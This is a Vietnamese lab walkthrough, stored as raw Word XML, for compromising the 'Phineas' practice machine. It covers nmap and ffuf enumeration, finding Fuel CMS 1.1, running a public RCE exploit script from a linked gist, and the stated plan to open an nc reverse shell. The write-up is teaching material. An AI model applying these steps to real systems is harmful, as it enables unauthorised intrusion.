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151EF" w14:textId="49E20E8D" w:rsidR="00826053" w:rsidRDefault="00826053" w:rsidP="003A7E6A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab: Phineas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59133B" w14:textId="41BAF705" w:rsidR="00826053" w:rsidRDefault="00826053">
      <w:r>
        <w:t xml:space="preserve">Sau khi setup lab cùng mạng với máy tấn công Kali, sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB561B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">netdiscover </w:t>
      </w:r>
      <w:r>
        <w:t>để kiểm tra ip của server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA34080" w14:textId="77A0DF3B" w:rsidR="00826053" w:rsidRDefault="005E4C36">
      <w:r w:rsidRPr="005E4C36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBB9E93" wp14:editId="66521FF5">
            <wp:extent cx="5731510" cy="16700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670050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0C37B" w14:textId="2A55DE06" w:rsidR="005E4C36" w:rsidRDefault="005E4C36">
      <w:r>
        <w:t>Ip server là 192.168.56.141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B336306" w14:textId="28BD74B8" w:rsidR="005E4C36" w:rsidRDefault="005E4C36">
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4C36">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo nmap -sC -sV -p- -T4 192.168.56.141 -v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để liệt kê các cổng đang mở của server, ta thu được kết quả sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073374BD" w14:textId="3457B205" w:rsidR="005E4C36" w:rsidRDefault="00D771DF" w:rsidP="00280D1A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D771DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8CA15B" wp14:editId="74171398">
            <wp:extent cx="4915326" cy="338357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5326" cy="3383573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="235530C7" w14:textId="5F624B45" w:rsidR="00D771DF" w:rsidRDefault="00D771DF">
      <w:r>
        <w:t xml:space="preserve">Ta thấy server có thể login qua ssh, 1 trang web mở trên port 80, và mysql server trên port 3306, nhưng không thể truy cập mysql được. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE7167" w14:textId="1E23C0B0" w:rsidR="00D33C81" w:rsidRDefault="00D33C81">
      <w:r>
        <w:t>Ta sẽ tập trung vào trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA3E6BE" w14:textId="2944FA6B" w:rsidR="00D33C81" w:rsidRDefault="00D33C81">
      <w:r>
        <w:t>Bước đầu tiên khi tiếp cận 1 trang web</w:t>
      </w:r>
      <w:r w:rsidR="00280D1A">
        <w:t xml:space="preserve">, ta sử dụng BurpSuite để liệt kê cây thư mục của Web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56479EFB" w14:textId="3914DDF5" w:rsidR="00280D1A" w:rsidRDefault="00DB1C7B" w:rsidP="00280D1A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB1C7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24AB4A13" wp14:editId="5A458BE6">
            <wp:extent cx="1447925" cy="11812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7925" cy="1181202"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1612E" w14:textId="3BDF677B" w:rsidR="007A1355" w:rsidRDefault="00DB1C7B" w:rsidP="00DB1C7B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Không có gì đáng nghi, </w:t>
      </w:r>
      <w:r w:rsidR="005B2A82">
        <w:t xml:space="preserve">tiếp theo ta sẽ liệt kê các </w:t>
      </w:r>
      <w:r w:rsidR="007A1355">
        <w:t xml:space="preserve">file trong thư mục chứa web của server bằng </w:t>
      </w:r>
      <w:r w:rsidR="007A1355" w:rsidRPr="007A1355">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>fuff</w:t>
      </w:r>
      <w:r w:rsidR="007A1355" w:rsidRPr="00D522A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D522A7">
        <w:t xml:space="preserve">với câu lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00D522A7" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.56.141/FUZZ -e .txt,.html,.php -fs 4897,9288 -recursion -recursion-depth 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0491A046" w14:textId="58DA2D2B" w:rsidR="00D522A7" w:rsidRPr="00D77D20" w:rsidRDefault="00D522A7" w:rsidP="00DB1C7B">
      <w:r>
        <w:t xml:space="preserve">Trong đó </w:t>
      </w:r>
      <w:r w:rsidR="000512EC" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt</w:t>
      </w:r>
      <w:r w:rsidR="000512EC">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000512EC">
        <w:t xml:space="preserve">là wordlist, </w:t>
      </w:r>
      <w:r w:rsidR="000512EC" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="000512EC" w:rsidRPr="006F689D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.141</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000512EC">
        <w:t xml:space="preserve"> là địa chỉ trang web của server</w:t>
      </w:r>
      <w:r w:rsidR="007A2B03">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007A2B03" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-e .txt,.html,.php</w:t>
      </w:r>
      <w:r w:rsidR="007A2B03">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A2B03">
        <w:t xml:space="preserve">là các extension mà các file trong thư mục web có thể có, </w:t>
      </w:r>
      <w:r w:rsidR="007A2B03" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-fs 4897,9288</w:t>
      </w:r>
      <w:r w:rsidR="007A2B03">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A2B03">
        <w:t xml:space="preserve">là lọc các </w:t>
      </w:r>
      <w:r w:rsidR="00FA5512">
        <w:t>response có</w:t>
      </w:r>
      <w:r w:rsidR="00D77D20">
        <w:t xml:space="preserve"> size là 4897,9288 (tuỳ thuộc vào trang web), </w:t>
      </w:r>
      <w:r w:rsidR="00D77D20" w:rsidRPr="00D522A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-recursion -recursion-depth 1</w:t>
      </w:r>
      <w:r w:rsidR="00D77D20">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D77D20">
        <w:t>là độ sâu của cây thư mục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C91A5" w14:textId="6F382376" w:rsidR="00D522A7" w:rsidRDefault="00D522A7" w:rsidP="00DB1C7B">
      <w:r w:rsidRPr="00D522A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BBBACA" wp14:editId="370A1B92">
            <wp:extent cx="5731510" cy="26142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4295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7F720" w14:textId="1F331BA0" w:rsidR="0003682F" w:rsidRDefault="00D77D20" w:rsidP="00DB1C7B">
      <w:r>
        <w:t xml:space="preserve">Sau khi chạy, ta phát hiện ra thêm folder </w:t>
      </w:r>
      <w:r w:rsidR="00C362D0">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>struc</w:t>
      </w:r>
      <w:r w:rsidR="00C362D0">
        <w:t>ture với các mục con là /assets, /robots.txt, /fuel</w:t>
      </w:r>
      <w:r w:rsidR="0061732C">
        <w:t xml:space="preserve">. Nhưng tại trang </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="0061732C" w:rsidRPr="006F689D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.141/structure/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0061732C">
        <w:t xml:space="preserve"> có một logo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B785E5" w14:textId="30412D2B" w:rsidR="0061732C" w:rsidRDefault="0061732C" w:rsidP="0061732C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0061732C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E506F8" wp14:editId="41493348">
            <wp:extent cx="1562235" cy="13640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235" cy="1364098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EA68F" w14:textId="5363854B" w:rsidR="0061732C" w:rsidRDefault="0061732C" w:rsidP="0061732C">
      <w:r>
        <w:t>Cố gắng tìm kiếm trên mạng logo giống nhất, ta tìm được Fuel CMS</w:t>
      </w:r>
      <w:r w:rsidR="00213239">
        <w:t xml:space="preserve"> – là một h</w:t>
      </w:r>
      <w:r w:rsidR="00213239" w:rsidRPr="00213239">
        <w:t>ệ thống quản lý nội dung cho các trang web cao cấp</w:t>
      </w:r>
      <w:r w:rsidR="006A4280">
        <w:t xml:space="preserve">. Xem nguồn trang, ta biết được đây là phiên bản 1.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD6AB6" w14:textId="3A20FA0E" w:rsidR="006A4280" w:rsidRDefault="006A4280" w:rsidP="006A4280">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4280">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0267DACD" wp14:editId="65418EE3">
            <wp:extent cx="4084674" cy="85351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4674" cy="853514"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25BE69" w14:textId="7220F4B8" w:rsidR="00E34903" w:rsidRDefault="00E34903" w:rsidP="00E34903">
      <w:r>
        <w:t>Cấu trúc /structure như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC7D5D" w14:textId="6C0E1152" w:rsidR="00A139B4" w:rsidRDefault="00A139B4" w:rsidP="00A139B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/assets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB74F7" w14:textId="3E296AE8" w:rsidR="00A139B4" w:rsidRDefault="00DD08E5" w:rsidP="00A139B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD08E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F71AA6" wp14:editId="03C64061">
            <wp:extent cx="4328535" cy="36807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8535" cy="3680779"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732A542" w14:textId="7D0FEECC" w:rsidR="00A139B4" w:rsidRDefault="00DD08E5" w:rsidP="00DD08E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67490157" w14:textId="67A07631" w:rsidR="00DD08E5" w:rsidRDefault="00DD08E5" w:rsidP="00DD08E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD08E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F8E332" wp14:editId="0130E76F">
            <wp:extent cx="4656223" cy="10135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6223" cy="1013548"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E33568" w14:textId="7060EC66" w:rsidR="00DD08E5" w:rsidRDefault="00DD08E5" w:rsidP="00DD08E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/fuel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159F153" w14:textId="680C637A" w:rsidR="00DD08E5" w:rsidRDefault="00DD08E5" w:rsidP="00DD08E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD08E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E6B2B8F" wp14:editId="0072E91D">
            <wp:extent cx="4496190" cy="138696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6190" cy="1386960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E513E53" w14:textId="3DA32C7C" w:rsidR="000635C1" w:rsidRDefault="003C2F5C" w:rsidP="000635C1">
      <w:r>
        <w:t>Do trong thư mục assets không có gì đáng chú ý, ta t</w:t>
      </w:r>
      <w:r w:rsidR="000635C1">
        <w:t xml:space="preserve">iếp tục đào sâu vào /fuel bằng </w:t>
      </w:r>
      <w:r w:rsidR="000635C1" w:rsidRPr="000635C1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:r w:rsidR="000635C1">
        <w:t xml:space="preserve"> với lệnh</w:t>
      </w:r>
      <w:r w:rsidR="005112CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005112CA" w:rsidRPr="005112CA">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.56.141/structure/fuel/FUZZ -e .txt,.html,.php  -fs 94105</w:t>
      </w:r>
      <w:r w:rsidR="005112CA">
        <w:t>, ta liệt kê thêm được các mục con của /fuel :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EA81C" w14:textId="2F066C29" w:rsidR="005112CA" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/Index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0F3B3" w14:textId="63180C97" w:rsidR="0073032F" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0073032F">
        <w:t>modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA7E0A9" w14:textId="3AE9743F" w:rsidR="003835EC" w:rsidRDefault="003835EC" w:rsidP="003835EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003835EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291D6EA7" wp14:editId="692AC75F">
            <wp:extent cx="4519052" cy="24005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9052" cy="2400508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="011409C4" w14:textId="4EDE0905" w:rsidR="0073032F" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0073032F">
        <w:t>scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370CEA1F" w14:textId="1DAC1E49" w:rsidR="003835EC" w:rsidRDefault="003835EC" w:rsidP="003835EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003835EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F12A26B" wp14:editId="38EDE326">
            <wp:extent cx="4496190" cy="20270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6190" cy="2027096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DAE5E" w14:textId="4A36812C" w:rsidR="0073032F" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0073032F">
        <w:t>install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806496E" w14:textId="1B258925" w:rsidR="003835EC" w:rsidRDefault="003835EC" w:rsidP="003835EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003835EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0B0DE3" wp14:editId="65206ED7">
            <wp:extent cx="4450466" cy="2583404"/>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0466" cy="2583404"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EC78C" w14:textId="4D3A9583" w:rsidR="0073032F" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0073032F">
        <w:t>application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B869310" w14:textId="1499850B" w:rsidR="00E34903" w:rsidRDefault="00E34903" w:rsidP="00E34903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34903">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6091C0E0" wp14:editId="52A12EF6">
            <wp:extent cx="4808637" cy="53116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8637" cy="5311600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F504199" w14:textId="0C936831" w:rsidR="0073032F" w:rsidRDefault="0073032F" w:rsidP="005112CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0073032F">
        <w:t>licenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10C498" w14:textId="1FFF1C67" w:rsidR="00E34903" w:rsidRDefault="007144FF" w:rsidP="00E34903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007144FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18F16E4B" wp14:editId="0120E2AE">
            <wp:extent cx="4519052" cy="249195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9052" cy="2491956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7ECADA" w14:textId="469B2CCC" w:rsidR="0073032F" w:rsidRDefault="007144FF" w:rsidP="007144FF">
      <w:r>
        <w:t>Xem qua các thư mục, ta thấy hầu hết các file đều không xem được, chỉ có một số file .txt, .sql có thể xem và tải về được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1268FF" w14:textId="57079702" w:rsidR="00FF4A4E" w:rsidRDefault="00FF4A4E" w:rsidP="007144FF">
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm lỗ hổng liên quan đến Fuel CMS version 1.1, </w:t>
      </w:r>
      <w:r w:rsidR="00A9429C">
        <w:t xml:space="preserve">có một link github chứa thông tin về </w:t>
      </w:r>
      <w:r w:rsidR="0008418B">
        <w:t xml:space="preserve">cách khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00A9429C">
        <w:t>lổ hổng RCE này</w:t>
      </w:r>
      <w:r w:rsidR="0008418B">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="0008418B" w:rsidRPr="006F689D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28DFA8E0" w14:textId="275E5C70" w:rsidR="0069241E" w:rsidRDefault="00A3498C" w:rsidP="007144FF">
      <w:r>
        <w:t>Tải file exploit.py về và sửa đổi địa chỉ ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CFDF7" w14:textId="7085D7E6" w:rsidR="0069241E" w:rsidRDefault="0069241E" w:rsidP="0069241E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0069241E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B876BC" wp14:editId="14AFDE98">
            <wp:extent cx="3917019" cy="1325995"/>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7019" cy="1325995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBA846" w14:textId="50716294" w:rsidR="00A3498C" w:rsidRDefault="00A3498C" w:rsidP="007144FF">
      <w:r>
        <w:t>, tiến hành chạy tập lệnh bằng python3, ta nhận được cmd từ server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08737E9F" w14:textId="71EEE78C" w:rsidR="00BB6B72" w:rsidRDefault="00BB6B72" w:rsidP="007144FF">
      <w:r w:rsidRPr="00BB6B72">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7535E011" wp14:editId="2A34FE56">
            <wp:extent cx="5731510" cy="1073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73785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15557486" w14:textId="1D79EC67" w:rsidR="0008418B" w:rsidRDefault="006A33A4" w:rsidP="007144FF">
      <w:r>
        <w:t xml:space="preserve">Ta sẽ tạo reverse shell bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5A92">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để</w:t>
      </w:r>
      <w:r w:rsidR="008B5A92">
        <w:t xml:space="preserve"> dễ có một shell ổn định hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696EDC0B" w14:textId="1A0D638F" w:rsidR="005468B8" w:rsidRDefault="005468B8" w:rsidP="007144FF">
      <w:r w:rsidRPr="005468B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB11EDF" wp14:editId="15E5746C">
            <wp:extent cx="5731510" cy="8312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31215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
